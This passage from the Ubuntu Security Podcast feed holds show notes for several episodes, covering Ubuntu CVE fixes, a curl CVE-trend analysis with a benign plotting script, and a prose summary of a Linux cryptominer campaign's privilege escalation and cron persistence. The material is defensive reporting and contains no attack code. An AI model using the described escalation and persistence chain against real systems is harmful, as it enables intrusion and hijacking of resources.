<li>Decodes basic shellcode to open a socket to the C2 server and downloads
additional shellcode to run plus the <a href="https://github.com/rapid7/mettle">mettle</a> interpreter so that it can make
use of off-the-shelf components from Metasploit in further stages</li>
<li>Also downloads the next stage dropper</li>
<li>This again is encoded the same as the first component - contained within is
shellcode to spawn a shell via <code>/bin/sh</code> - from this shell it then attempts to
run commands to exploit two known privesc vulns - CVE-2021-4034
(<a href="/episode-147/#usn-5252-1-usn-5252-2-policykit-vulnerability-10-06">[USN-5252-1, USN-5252-2] PolicyKit vulnerability from Episode 147</a>) and
CVE-2021-3493 (<a href="/episode-113/#usn-4916-2-linux-kernel-regression-00-48">[USN-4916-2] Linux kernel vulnerability in Episode 113</a>)</li>
<li>Once has gained root privileges via these vulns, with then move on to achieve
persistence and execute the primary payload - cryptominer</li>
<li>Persistence is achieved simply by using cron to download the cryptominer from
C2 on boot - and then another cron job to execute the cryptominer - and this
is done for both the standard user and root</li>
<li>As such the only traces left on the machine at reboot is the crontabs</li>
<li>cryptominer is the <a href="https://xmrig.com/">XMRig</a> and is configured to mine Monero</li>
<li>C2 is seemingly fronted by cloudflare and cloudfront</li>
<li>No details provided on initial compromise but is good to see details on the
privesc vulns - both of these were patched in Ubuntu quite a while ago - and
we released a Livepatch for the kernel privesc too - shows the value in such
services - can still stay protected against the kind of vulnerabilities that
attackers are actually exploiting without the need to reboot</li>
<li>Shows the increasing prevalence of Linux malware (and the resulting interest
in it from organisations like AT&amp;T) but also the value in ensuring systems are
kept updated</li>
</ul>
<h3 id="systemd-open-vm-tools-regression-for-ubuntu-18-dot-04-lts-10-56">systemd/open-vm-tools regression for Ubuntu 18.04 LTS [10:56]</h3>
<ul>
<li>Had mentioned last week that I would likely cover this - is still a
work-in-progress so hopefully next week 🤞</li>
</ul>
<h2 id="hiring-11-30">Hiring [11:30]</h2>
<ul>
<li><a href="https://canonical.com/careers/engineering?search=security">https://canonical.com/careers/engineering?search=security</a></li>
<li><a href="https://canonical.com/careers/3781589">Security Certifications Product Manager</a>
<ul>
<li>Home based, EMEA</li>
</ul>
</li>
<li><a href="https://canonical.com/careers/2925180">Security Engineer - Ubuntu</a>
<ul>
<li>Home based, worldwide</li>
</ul>
</li>
<li><a href="https://canonical.com/careers/4192903">Ubuntu Security Manager</a>
<ul>
<li>Home based, worldwide</li>
</ul>
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E176.mp3" length="8809875" type="audio/mpeg" /><itunes:duration>769</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 175
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-175/</link>
          <pubDate>Fri, 02 Sep 2022 22:24:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>95c19b5802fa9d9e607ed088a9b2334b23a4dc75719852a298dabdead31716dd905baa7eb157bca7c0f331244f24cd17e9c27c1c23459b693aa0b6861cc590fd</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 175</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          An increased rate of CVEs in curl is a good thing, and we'll tell you why, plus
  we cover security updates for the Linux kernel, Firefox, Schroot, systemd and
  more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  An increased rate of CVEs in curl is a good thing, and we'll tell you why, plus
  we cover security updates for the Linux kernel, Firefox, Schroot, systemd and
  more.
  </itunes:summary>
        <description>  An increased rate of CVEs in curl is a good thing, and we'll tell you why, plus
  we cover security updates for the Linux kernel, Firefox, Schroot, systemd and
  more.
  </description>
        <googleplay:description>  An increased rate of CVEs in curl is a good thing, and we'll tell you why, plus
  we cover security updates for the Linux kernel, Firefox, Schroot, systemd and
  more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>An increased rate of CVEs in curl is a good thing, and we&rsquo;ll tell you why, plus
we cover security updates for the Linux kernel, Firefox, Schroot, systemd and
more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>37 unique CVEs addressed</p>
<h3 id="usn-5474-2-varnish-cache-regression-00-43">[<a href="https://ubuntu.com/security/notices/USN-5474-2">USN-5474-2</a>] Varnish Cache regression [00:43]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-11653">CVE-2020-11653</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-164/#usn-5474-1-varnish-cache-vulnerabilities-01-41">USN-5474-1 from Episode 164</a></li>
<li>incomplete fix in original update - required additional patches from
upstream - thanks to community member who reported this and provided the
associated debdiff to fix it</li>
</ul>
<h3 id="usn-5572-2-usn-5579-1-linux-kernel-vulnerabilities-01-27">[<a href="https://ubuntu.com/security/notices/USN-5572-2">USN-5572-2</a>, <a href="https://ubuntu.com/security/notices/USN-5579-1">USN-5579-1</a>] Linux kernel vulnerabilities [01:27]</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-33741">CVE-2022-33741</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33740">CVE-2022-33740</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26365">CVE-2022-26365</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.4 AWS 14.04 ESM + 4.4 generic etc 16.04 ESM + 14.04 ESM</li>
<li>3 issues in Xen PV drivers - all memory management issues</li>
<li><a href="/episode-174/#usn-5572-1-linux-kernel--aws--vulnerabilities-02-45">See USN-5572-1 from Episode 174</a></li>
</ul>
<h3 id="usn-5580-1-linux-kernel--aws--vulnerabilities-01-54">[<a href="https://ubuntu.com/security/notices/USN-5580-1">USN-5580-1</a>] Linux kernel (AWS) vulnerabilities [01:54]</h3>
<ul>
<li>4 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-36946">CVE-2022-36946</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-20368">CVE-2022-20368</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33656">CVE-2021-33656</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33655">CVE-2021-33655</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.4 AWS 16.04 ESM</li>
<li>One of these is an OOB write in the framebuffer driver - covered previously in
<a href="/episode-174/#usn-5577-1-linux-kernel--oem--vulnerabilities-03-38">USN-5577-1 in Episode 174</a></li>
<li>Others:
<ul>
<li>OOB write in virtual terminal driver when changing VGA console fonts</li>
<li>OOB read in Packet network protocol -&gt; info leak</li>
<li>Assertion failure (-&gt; kernel panic) in netfilter when handling rules which
truncate packets below their header size -&gt; remote DoS</li>
</ul>
</li>
</ul>
<h3 id="usn-5582-1-linux-kernel--azure-cvm--vulnerabilities-02-42">[<a href="https://ubuntu.com/security/notices/USN-5582-1">USN-5582-1</a>] Linux kernel (Azure CVM) vulnerabilities [02:42]</h3>
<ul>
<li>11 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-28893">CVE-2022-28893</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1975">CVE-2022-1975</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1974">CVE-2022-1974</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1734">CVE-2022-1734</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1679">CVE-2022-1679</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1652">CVE-2022-1652</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1048">CVE-2022-1048</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0494">CVE-2022-0494</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2586">CVE-2022-2586</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2588">CVE-2022-2588</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-34918">CVE-2022-34918</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Azure Confidential Virtual Machines - implements FDE so that contents is
protected from VM host</li>
<li>5.4 kernel</li>
<li>3 high priority vulns that allow a local unpriv user to privesc - first
covered back in <a href="/episode-172/#usn-5557-1-linux-kernel-vulnerabilities-13-44">USN-5557-1 in Episode 172</a> - all in netfilter / network packet
scheduler subsystems</li>
</ul>
<h3 id="usn-5588-1-linux-kernel-vulnerability-03-43">[<a href="https://ubuntu.com/security/notices/USN-5588-1">USN-5588-1</a>] Linux kernel vulnerability [03:43]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-2588">CVE-2022-2588</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>3.13 GA</li>
</ul>
<h3 id="usn-5589-1-linux-kernel-vulnerabilities-03-56">[<a href="https://ubuntu.com/security/notices/USN-5589-1">USN-5589-1</a>] Linux kernel vulnerabilities [03:56]</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-33656">CVE-2021-33656</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33061">CVE-2021-33061</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 GA/OEM/Raspi/lowlatency</li>
<li>OOB write in virtual terminal driver mentioned earlier</li>
<li>Improper control flow mgmt in Intel 10GbE PCIe driver - local DoS</li>
</ul>
<h3 id="usn-5590-1-linux-kernel--oem--vulnerability-04-24">[<a href="https://ubuntu.com/security/notices/USN-5590-1">USN-5590-1</a>] Linux kernel (OEM) vulnerability [04:24]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-36946">CVE-2022-36946</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.14 OEM</li>
<li>Assertion failure on netfilter rules that truncate packets below their header
size mentioned earlier</li>
</ul>
<h3 id="usn-5578-2-open-vm-tools-vulnerability-04-34">[<a href="https://ubuntu.com/security/notices/USN-5578-2">USN-5578-2</a>] Open VM Tools vulnerability [04:34]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-31676">CVE-2022-31676</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Privesc within guest - <a href="/episode-174/#usn-5578-1-open-vm-tools-vulnerability-06-23">USN-5578-1 from Episode 174</a></li>
</ul>
<h3 id="usn-5581-1-firefox-vulnerabilities-04-57">[<a href="https://ubuntu.com/security/notices/USN-5581-1">USN-5581-1</a>] Firefox vulnerabilities [04:57]</h3>
<ul>
<li>5 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-38478">CVE-2022-38478</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-38477">CVE-2022-38477</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-38475">CVE-2022-38475</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-38473">CVE-2022-38473</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-38472">CVE-2022-38472</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>104.0 - usual mix of browser security issues - DoS, chrome UI spoofing, bypass
security restrictions, RCE via malicious web content</li>
</ul>
<h3 id="usn-5584-1-schroot-vulnerability-05-25">[<a href="https://ubuntu.com/security/notices/USN-5584-1">USN-5584-1</a>] Schroot vulnerability [05:25]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-2787">CVE-2022-2787</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Not a tool that is normally used by most users / customers - BUT is used by
many Ubuntu developers - interesting avenue for a supply chain attack perhaps?</li>
<li>DoS via crafted schroot names - one user could launch a schroot with a crafted
name that would then result in schroot corrupting its internal state and then
stopping it from launching any more schroot sessions for any other users on
the machine</li>
</ul>
<h3 id="usn-5586-1-sdl-vulnerability-07-05">[<a href="https://ubuntu.com/security/notices/USN-5586-1">USN-5586-1</a>] SDL vulnerability [07:05]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-34568">CVE-2022-34568</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>UAF in handling of crafted video content on X11</li>
</ul>
<h3 id="usn-5583-1-systemd-vulnerability-07-14">[<a href="https://ubuntu.com/security/notices/USN-5583-1">USN-5583-1</a>] systemd vulnerability [07:14]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-2526">CVE-2022-2526</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible UAF when handling crafted DNS requests -&gt; crash / RCE</li>
<li>Ask me about this one next week 😉</li>
</ul>
<h3 id="usn-5585-1-jupyter-notebook-vulnerabilities-07-44">[<a href="https://ubuntu.com/security/notices/USN-5585-1">USN-5585-1</a>] Jupyter Notebook vulnerabilities [07:44]</h3>
<ul>
<li>8 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-29238">CVE-2022-29238</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-24758">CVE-2022-24758</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26215">CVE-2020-26215</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9644">CVE-2019-9644</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10856">CVE-2019-10856</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10255">CVE-2019-10255</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-21030">CVE-2018-21030</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19351">CVE-2018-19351</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Another community contributed update - fixes various issues such as XSS, open
redirect, info leak etc</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="increased-cve-activity-in-curl-08-09">Increased CVE activity in curl [08:09]</h3>
<ul>
<li><a href="https://daniel.haxx.se/blog/2022/08/22/increased-cve-activity-in-curl/">https://daniel.haxx.se/blog/2022/08/22/increased-cve-activity-in-curl/</a></li>
<li>Daniel Stenberg (curl maintainer) put a poll on twitter asking if folks had
noticed an increased rate in CVEs for curl in the last year
<ul>
<li>~45% - yes - and it&rsquo;s good</li>
<li>~2% - yes - and it&rsquo;s bad</li>
<li>~40% - no</li>
<li>~12% - I don&rsquo;t understand the question</li>
</ul>
</li>
<li>This can be seen easily on the curl dashboard <a href="https://curl.se/dashboard.html">https://curl.se/dashboard.html</a>
in particular on <a href="https://curl.se/dashboard1.html#vulns-per-year">https://curl.se/dashboard1.html#vulns-per-year</a></li>
<li>We can see the same results from the Ubuntu CVE Tracker via jq and gnuplot
(plus curl itself to fetch the data in the first place):</li>
</ul>
<!-- raw HTML omitted -->
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span><span style="color:#75715e">#!/bin/bash
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">for</span> d in <span style="color:#66d9ef">$(</span>curl -s <span style="color:#e6db74">&#34;https://ubuntu.com/security/cves.json?order=newest&amp;package=curl&amp;limit=100&#34;</span> | jq -r <span style="color:#e6db74">&#34;.cves[].published&#34;</span><span style="color:#66d9ef">)</span>; <span style="color:#66d9ef">do</span>
</span></span><span style="display:flex;"><span>  date +%s -d <span style="color:#e6db74">&#34;</span>$d<span style="color:#e6db74">&#34;</span>;
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">done</span> &gt; curlhist
</span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-gnuplot" data-lang="gnuplot"><span style="display:flex;"><span><span style="color:#75715e">#!/usr/bin/gnuplot</span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>binwidth <span style="color:#f92672">=</span> <span style="color:#ae81ff">60</span><span style="color:#f92672">*</span><span style="color:#ae81ff">60</span><span style="color:#f92672">*</span><span style="color:#ae81ff">24</span><span style="color:#f92672">*</span><span style="color:#ae81ff">365</span> <span style="color:#75715e"># ~30days in seconds</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">bin</span>(x<span style="color:#f92672">,</span>width)<span style="color:#f92672">=</span>width<span style="color:#f92672">*</span><span style="color:#a6e22e">floor</span>(x<span style="color:#f92672">/</span>width) <span style="color:#f92672">+</span> width<span style="color:#f92672">/</span><span style="color:#ae81ff">2.0</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">set</span> xdata time
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">set</span> datafile missing NaN
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">set</span> boxwidth binwidth
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">set</span> xtics format <span style="color:#e6db74">&#34;%Y&#34;</span> time rotate
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">set</span> style fill solid <span style="color:#ae81ff">0.5</span> <span style="color:#75715e"># fill style</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">set</span> title <span style="color:#e6db74">&#39;Frequency of curl CVEs in the Ubuntu CVE Tracker by year&#39;</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">plot</span> <span style="color:#e6db74">&#39;curlhist&#39;</span> using (bin(<span style="color:#960050;background-color:#1e0010">$</span><span style="color:#ae81ff">1</span><span style="color:#f92672">,</span>binwidth))<span style="color:#f92672">:</span>(<span style="color:#ae81ff">1.0</span>) \
</span></span><span style="display:flex;"><span>    smooth freq with boxes notitle
</span></span></code></pre></div><figure><img src="/img/curlhist.svg">
</figure>

<ul>
<li>curl CVE frequency has increased in recent years</li>
<li>however is still less than what it was back in 2016</li>
<li>Daniel explains how for each CVE wounds his pride that he didn&rsquo;t find it in
the first place (or actually not introduce it) - but overall it is good they
are being looked for and found and fixed</li>
<li>curl has a bug bounty - and this works as a good incentive
<ul>
<li>has paid out over $40kUSD since it started</li>
</ul>
</li>
<li>This year though the 15 reports came from just 4 people
<ul>
<li>and 60% came from a single individual</li>
<li>shows that to do this kind of work you need to have a deep, intimate
knowledge of the code - can&rsquo;t just drive by and find bugs - need to spend a
lot of time getting to know the code and protocols etc well to be able to
find these sorts of issues</li>
<li>indicates that curl is a high quality project since it is hard to find
security issues</li>
<li>long lived codebase that has been well studied and improved over the years</li>
</ul>
</li>
<li>Speaking of being long-lived - Daniel also then looks at the average lifetime
of each CVE in curl - like the Linux kernel, curl developers go back and try
find out what commit introduced a particular vulnerability - they can then
compare the time from when that original commit was introduced to when the
commit which fixes the bug was made</li>
<li>On average, for all CVEs - 2,867 days - 7 years 10 months
<ul>
<li>For those in the past 12 months - 3,245 days - almost 9 years</li>
</ul>
</li>
<li>I mentioned the Linux kernel - Kees Cook (ex Ubuntu Security) has done <a href="https://outflux.net/blog/archives/2016/10/18/security-bug-lifetime/">similar
analysis</a> using the data we collect in the Ubuntu CVE Tracker over the years
and found that for kernel vulnerabilities the average lifetime is 5.5 years</li>
<li>In general, curl has had a steady rate of development of around 1300 commits
per year since 2007</li>
<li>So on average the same amount of code churn is happening still (although this
doesn&rsquo;t tell us if say the same amount of new code is being written each
year - perhaps this is more refactoring / cleanups over time?)
<ul>
<li>but if we assume it is the same amount of new code being written each year,
but since the CVE lifetime is growing over time, then more CVEs are being
found in the older code than newer code - and as such the quality of the
code seems to be improving over time</li>
<li>we can clean a bunch of info from the dashboard:
<ul>
<li>test cases - these are growing linearly over time</li>
<li>number of CI jobs - also growing linearly over time</li>
<li>both indicate an increase in tooling to improve quality over time</li>
</ul>
</li>
</ul>
</li>
<li>Final thought: whilst on the surface the idea that curl has got more CVEs
recently sounds bad, this is actually a good thing - it means these long lived
vulnerabilties are being found and fixed - this is a good thing - and the bug
bounty provides a good incentive to first encourage vulns to be looked for and
found and then to make sure they get reported and hence fixed (and not say
hoarded or sold to third parties etc)</li>
<li><a href="https://curl.se/dashboard1.html#vulns-plot">Great graph showing the rate of vulns introduced over time and vulns being fixed over time</a>
<ul>
<li>Shows vulns get introduced linearly but they are getting fixed
exponentially - so over time the number of latent vulns in the curl codebase
is decreasing - and this is definitely a good thing</li>
<li>Also shows the benefit of having a bug bounty - if you want vulns to get
found and fixed you need to create an environment that encourages that - and
what is more motivating than cold hard cash?</li>
</ul>
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E175.mp3" length="12947194" type="audio/mpeg" /><itunes:duration>1057</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 174
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-174/</link>
          <pubDate>Fri, 26 Aug 2022 16:25:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>15ba43838b15754484b2d2dbe8c52b8e826b3e652bb8cf54ae8921c0359da39f4c944af6366bf00d9f0b0ec4716c5cb4b676497afb54f5cb93004700834a75f2</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 174</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we cover the debate around the decision in Ubuntu 22.10 to disable
  presenting platform security assessments to end users via GNOME, plus we look at
  security updates for zlib, PostgreSQL, the Linux kernel, Exim and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we cover the debate around the decision in Ubuntu 22.10 to disable
  presenting platform security assessments to end users via GNOME, plus we look at
  security updates for zlib, PostgreSQL, the Linux kernel, Exim and more.
  </itunes:summary>
        <description>  This week we cover the debate around the decision in Ubuntu 22.10 to disable
  presenting platform security assessments to end users via GNOME, plus we look at
  security updates for zlib, PostgreSQL, the Linux kernel, Exim and more.
  </description>
        <googleplay:description>  This week we cover the debate around the decision in Ubuntu 22.10 to disable
  presenting platform security assessments to end users via GNOME, plus we look at
  security updates for zlib, PostgreSQL, the Linux kernel, Exim and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we cover the debate around the decision in Ubuntu 22.10 to disable
presenting platform security assessments to end users via GNOME, plus we look at
security updates for zlib, PostgreSQL, the Linux kernel, Exim and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>12 unique CVEs addressed</p>
<h3 id="usn-5570-1-usn-5573-1-zlib-and-rsync-vulnerability-00-43">[<a href="https://ubuntu.com/security/notices/USN-5570-1">USN-5570-1</a>, <a href="https://ubuntu.com/security/notices/USN-5573-1">USN-5573-1</a>] zlib and rsync vulnerability [00:43]</h3>
<ul>
<li>1 CVEs addressed for zlib in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)</li>
<li>1 CVEs addressed for rsync in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-37434">CVE-2022-37434</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Heap-buffer over-read via crafted gzip header - requires an application to
call the <code>inflateGetHeader()</code> function so not everything that uses zlib would be
affected - impact is DoS via crash</li>
<li>Also turns out the original fix introduced a regression upstream so required a
couple different patches to fix this
<ul>
<li>thankfully by the time we got around to patching this the regression had
already been identified and fixed upstream but some other distros who were
quicker off-the-mark were affected by the regression</li>
</ul>
</li>
<li>Also affects rsync in older Ubuntu releases since it contains a vendored copy
of zlib - but on newer releases rsync uses the system install zlib and so once
that is patched then rsync is also effectively patched too</li>
</ul>
<h3 id="usn-5571-1-postgresql-vulnerability-02-12">[<a href="https://ubuntu.com/security/notices/USN-5571-1">USN-5571-1</a>] PostgreSQL vulnerability [02:12]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-2625">CVE-2022-2625</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Allowed possible code execution as the postgres superuser via various
extensions - some of these are bundled with postgres itself and some may come
from external sources - was fixed however in the core postgres server so no
need to modify/fix other extensions to remediate this vuln - just need to
update to this new patched version</li>
</ul>
<h3 id="usn-5572-1-linux-kernel--aws--vulnerabilities-02-45">[<a href="https://ubuntu.com/security/notices/USN-5572-1">USN-5572-1</a>] Linux kernel (AWS) vulnerabilities [02:45]</h3>
<ul>
<li>3 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-33741">CVE-2022-33741</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33740">CVE-2022-33740</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26365">CVE-2022-26365</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.4 16.04 ESM AWS</li>
<li>3 issues all in Xen paravirtualisation handling - 1 in virtual block driver
and another in the PV frontend - both of which failed to properly initialise
memory - could then allow a local attacker to see guest memory contents</li>
<li>Third one - memory mgmt issue in PV frontend which could end up sharing
unrelated data when communicating with various backends - could then possibly
lead to a crash of the guest or info leak of guest memory etc</li>
</ul>
<h3 id="usn-5577-1-linux-kernel--oem--vulnerabilities-03-38">[<a href="https://ubuntu.com/security/notices/USN-5577-1">USN-5577-1</a>] Linux kernel (OEM) vulnerabilities [03:38]</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-33655">CVE-2021-33655</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33061">CVE-2021-33061</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.14 OEM kernels</li>
<li>Intel 10GbE PCI Express driver - insufficient control flow management -&gt; local
DoS</li>
<li>Framebuffer driver failed to verify size limits when changing font / screen
sizes -&gt; OOB write -&gt; DoS/codeexec-&gt;privesc</li>
</ul>
<h3 id="usn-5574-1-exim-vulnerability-04-11">[<a href="https://ubuntu.com/security/notices/USN-5574-1">USN-5574-1</a>] Exim vulnerability [04:11]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-37452">CVE-2022-37452</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Single-byte heap buffer overflow when doing a host name lookup under certain
configurations - failed to account for terminating NUL byte and so could
overwrite this and hence leave a string without a trailing NUL - run of end of
string -&gt; subsequent further buffer overflow</li>
<li><a href="https://github.com/ivd38/exim_overflow">https://github.com/ivd38/exim_overflow</a></li>
<li>Requires to have set a custom configuration where the value of one config
items references the global variable <code>sender_host_name</code> so unlikely to affect
most installations</li>
</ul>
